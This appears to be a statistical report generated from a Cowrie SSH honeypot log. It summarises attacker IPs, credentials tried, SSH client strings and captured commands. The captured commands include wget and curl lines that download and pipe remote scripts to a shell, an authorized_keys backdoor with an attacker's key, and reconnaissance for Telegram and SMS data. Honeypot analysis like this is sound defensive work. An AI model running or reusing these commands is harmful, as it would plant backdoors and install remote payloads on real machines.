========================================================================
COWRIE LOG ANALYSIS
File: cowrie_ok.json
Date: Sat May 17 20:36:49 -03 2025
========================================================================

1) Top 20 source IPs (with country)

   count   source IP          country
   180424  159.223.200.138    US, United States
   1974    178.19.106.86      PL, Poland
   1958    5.178.96.38        GB, United Kingdom
   1870    196.251.88.103     NL, Netherlands
   1870    170.64.147.99      AU, Australia
   1870    134.199.172.30     AU, Australia
   1667    79.175.176.177     IR, Iran, Islamic Republic of
   1419    46.101.118.69      DE, Germany
   1296    45.135.232.24      RU, Russian Federation
   1236    158.101.158.236    JP, Japan
   764     8.219.249.60       SG, Singapore
   539     165.154.252.24     GB, United Kingdom
   480     185.93.89.118      IR, Iran, Islamic Republic of
   472     139.19.117.130     DE, Germany
   451     116.110.16.229     VN, Vietnam
   439     116.110.85.21      VN, Vietnam
   420     171.251.18.242     VN, Vietnam
   412     116.110.121.52     VN, Vietnam
   390     116.110.2.180      VN, Vietnam
   376     47.242.136.130     HK, Hong Kong

2) Top 10 commands executed

   count   command
   22646   echo -e "\x6F\x6B"
   1560    uname -s -v -n -r -m
   10      cd ~; chattr -ia .ssh; lockr -ia .ssh
   10      cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
   8       uname -a
   6       ps | grep '[Mm]iner'
   6       ps -ef | grep '[Mm]iner'
   6       ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
   6       locate D877F783D5D3EF8Cs
   6       ifconfig
   6       echo Hi | cat -n
   6       cat /proc/cpuinfo
   6       /ip cloud print
   4       ls
   4       id
   3       wget -qO - http://61.215.151.173/x/2sh | sh > /dev/null 2>&1 &
   3       wget -qO - http://61.215.151.173/x/1sh | sh > /dev/null 2>&1 &
   3       rm -rf /var/run/1sh; wget -c http://61.215.151.173/x/1sh -P /var/run && sh /var/run/1sh &
   3       rm -rf /tmp/2sh; wget -c http://61.215.151.173/x/2sh -P /tmp && sh /tmp/2sh &
   3       pwd

3) Login attempts (OK vs FAIL)

   OK:   24845
   FAIL: 955

4) Top 10 usernames with the most failed logins

   count   username
   183     root
   45      admin
   23      oracle
   20      ftp
   19      ftptest
   18      user
   18      test
   15      guido
   11      pi
   10      git

5) Top 10 passwords most used in failed logins

   count   password
   158     null
   105     123456
   21      root
   18      123
   13      admin
   13      abc123
   12      1234
   11      password
   9       345gs5662d34
   8       12345678

6) Session duration (cowrie.session.closed)

   Total sessions:   26238
   Mean duration:    2.65 s
   Maximum duration: 376.50 s

7) Top 20 SSH client version strings

   count   client version string
   24989   SSH-2.0-Go
   385     SSH-2.0-AsyncSSH_2.1.0
   118     SSH-2.0-libssh2_1.11.1
   107     SSH-2.0-JSCH-0.1.51
   53      SSH-2.0-libssh_0.11.1
   38      SSH-2.0-libssh2_1.9.0
   23      SSH-2.0-OPENSSH_7.9
   19      SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3
   19      SSH-2.0-OpenSSH_10.0p2 Debian-2
   16      SSH-2.0-ZGrab ZGrab SSH Survey
   13      SSH-2.0-OpenSSH_8.9p19
   12      SSH-2.0-Nmap-SSH2-Hostkey
   6       SSH-2.0-libssh2_1.11.0
   6       SSH-2.0-OpenSSH_5.3
   6       GET / HTTP/1.1
   5       SSH-2.0-libssh_0.9.5
   4       SSH-2.0-libssh_0.9.6
   4       SSH-2.0-libssh_0.10.5
   4       SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u2
   4       MGLNDD_181.46.193.237_22

8) Downloads detected via wget/curl

   count   command
   3       wget -qO - http://61.215.151.173/x/2sh | sh > /dev/null 2>&1 &
   3       wget -qO - http://61.215.151.173/x/1sh | sh > /dev/null 2>&1 &
   3       rm -rf /var/run/1sh; wget -c http://61.215.151.173/x/1sh -P /var/run && sh /var/run/1sh &
   3       rm -rf /tmp/2sh; wget -c http://61.215.151.173/x/2sh -P /tmp && sh /tmp/2sh &
   3       curl http://61.215.151.173/x/3sh | sh

========================================================================
Analysis complete.
========================================================================